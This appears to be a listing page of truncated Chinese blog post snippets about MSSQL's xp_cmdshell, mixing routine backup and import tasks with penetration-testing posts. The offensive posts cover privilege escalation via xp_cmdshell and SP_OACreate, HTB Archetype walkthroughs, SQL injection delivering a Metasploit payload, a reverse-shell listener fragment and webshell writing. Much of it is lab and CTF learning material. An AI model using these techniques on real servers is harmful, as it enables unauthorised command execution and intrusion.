• 2024-07-272023.7.2-3-4Mssql xp_cmdshell提权
    1.概念Mssql和SQLsever的一个产品的不同名称。都属于微软公司旗下。而上述Mssqlxp_cmdshell提权也属于数据库提权的一种。主要依赖于sqlserver自带的存储过程。1.1xp_cmdshell提权扩展存储过程中xp_cmdshell是一个开放接口,可以让sqlsever调用cmd命令。此过程在SQLsever
  • 2024-05-21Sql Server触发器调用exe控制台程序
    SqlServer触发器调用exe程序先在SqlServer中添加启动,需要手动启动(我用的是2019)--启用xp_cmdshellEXECsp_configure'showadvancedoptions',1RECONFIGUREEXECsp_configure'xp_cmdshell',1RECONFIGURE---执行过程EXECxp_cmdshell'D:\bin\Debug\net8.0\
  • 2024-04-07HTB-Archetype
    HTB-Archetype1.TASK1问题:哪个TCP端口托管着数据库服务器?识别运行数据库服务的端口,通常通过端口扫描(如使用nmap)来完成。nmap-sV10.129.57.230答案:14332.TASK2问题:通过SMB共享的非管理员共享的名称是什么?smbclient-L10.129.57.230答案:backups3.TASK3问题
  • 2024-03-27Sql server 2019 文件夹共享方式异地备份遇到的问题
    1、无法找到路径'\\192.168.66.50\share_domain\2、该作业失败。 无法确定所有者WIN-DOAR3JOEG2C\Administrator(拥有作业Mofang异地差异备份.Subplan_1)是否有服务器访问权限(原因:无法获取有关WindowsNT组/用户'WIN-DOAR3JOEG2C\Administrator'的信息,错误代码0x54
  • 2023-08-02MSSQL提权之xp_cmdshell、SP_OACreate、沙盒提权
    在xp_cmdshell被删除或者出错情况下,可以充分利用SP_OACreate进行提权 首先 EXECsp_configure'showadvancedoptions',1;  RECONFIGUREWITHOVERRIDE;  EXECsp_configure'OleAutomationProcedures',1;  RECONFIGUREWITHOVERRIDE;  EXECsp_configure'showad
  • 2023-07-21mssql的xp_cmdshell扩展
    introductionxp_cmdshellextension:storedprocedureexecutescommandstringasanoperatingsystemcommandinshell andretirevealloutputastextlinesdetermineifcurrentmssqlhasxp_cmdshellareturnvalueof1indicatestheextensionisxp_cmdsh
  • 2023-07-02BackUpLogView 系列 - 数据库备份脚本
    一键备份MSserver主机中所有数据库USEmaster;GOCREATEORALTERPROCEDUREdbo.BackupAllDatabases@BackupDirectoryNVARCHAR(255)ASBEGIN--获取当前日期和时间DECLARE@CurrentDateVARCHAR(8)=CONVERT(VARCH
  • 2023-06-23TIER 2: Archetype
    TIER2:Archetype扫描nmap使用nmap进行扫描目标IP,发现目标是Windows服务器,开放SMB和SQLServer服务。SMBSMB之前已经接触过,在Windows和Linux操作系统上连接SMB服务器的方法:windows上使用:使用资源管理器、cmd的net、powershell的New-PSDrive等。lin
  • 2023-04-26(a)ttempt SQL Ping and Auto Quick Brute Force 续2——原因
    今晚再次调试,发现生成的h2b.exe无法运行,这个文件用来把hex转换成bin,而且后面的代码,似乎也有问题:print"Metasploitpayloaddelivered.."print"Convertingourpayloadtobinary,thismaytakeafew..."query5=("""xp_cmdshell'h2bmetasploit%s&
  • 2023-04-26SQL Injector - POST Parameter Attack
    login.jsp如下:<%@pagelanguage="java"contentType="text/html;charset=UTF-8"pageEncoding="UTF-8"%><!DOCTYPEhtmlPUBLIC"-//W3C//DTDHTML4.01Transitional//EN""http://www.w3.org/TR/html4/loose.d
  • 2023-04-26MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
    fasttrack操作:root@bt:~#cd/pentest/exploits/fasttrack/root@bt:/pentest/exploits/fasttrack#./fast-track.py-i******************************************************Performingdependencychecks...******************************************************
  • 2023-04-26MSSQL2K - SQL Injector - Query String Parameter Attack获得反向cmdshell
    上次没有成功获得cmdshell,因为fasttrack没有这方面的代码,这次编写了server.py。importsocketHOST=''PORT=4444s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.bind((HOST,PORT))s.listen(1)conn,addr=s.accept()cmd="\n"try:whileTrue:
  • 2023-02-14SQL SERVER备份数据库到共享目录
    --如果xp_cmdshell没有启用,请先启用sp_configure'showadvancedoptions',1RECONFIGUREGOsp_configure'xp_cmdshell',1RECONFIGURE--目标共享目录:\\172.16.1.63
  • 2023-01-10SQLServer与excel和txt的导入导出
    execsp_configure'showadvancedoptions',1--启用高级配置选项设置reconfigure;--reconfigurewithoverride;--reconfigure不行则都用这个execsp_configure'AdHoc
  • 2023-01-08MSSQL数据库提权之XP_cmdshell提权
    xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。启用xp_cmdshell:EXEC
  • 2022-12-22渗透实录-02
    记录一次实战稍曲折拿下目标站点的过程。前期摸点IIS7.0+ASP.NET的组合,简单尝试发现前台登录页面可能存在SQL注入,数据包如下:为了节约时间直接祭出sqlmap,-rx.txt-v3
  • 2022-11-19各类数据库写入Webhsell总结
    1.MySQL写入WebShell1.1写入条件数据库的当前用户为ROOT或拥有FILE权限;知道网站目录的绝对路径;PHP的GPC参数为off状态;MySQL中的secure_file_priv参数不能为NULL状态;
  • 2022-10-18一次HTB_Archetype的详细通关过程
    0x00前言最近在打HackTheBox起点,第0层和第1层都是一些比较基础的靶场,没有什么知识盲区到了第2层的时候第一台机器就是sqlserver的靶场,打起来有点卡壳,而且这次学到了不少东
  • 2022-10-16xp_cmdshell的启用与关闭
    1、xp_cmdshell简介:xp_cmdshell扩展存储过程将命令字符串作为操作系统命令shell执行,并以文本行的形式返回所有输出。一般情况下默认处于关闭状态  2、开启xp_cmd
  • 2022-10-01给某个伙伴展示一次渗透提权
    某个正在学习安全伙伴告诉我,他老师给他一个靶机让他提权,他不知道怎么下手,让我来试一下,那就试一下   知道网段ip没开机密码,他说这个靶机是这样的。固定ip是192.168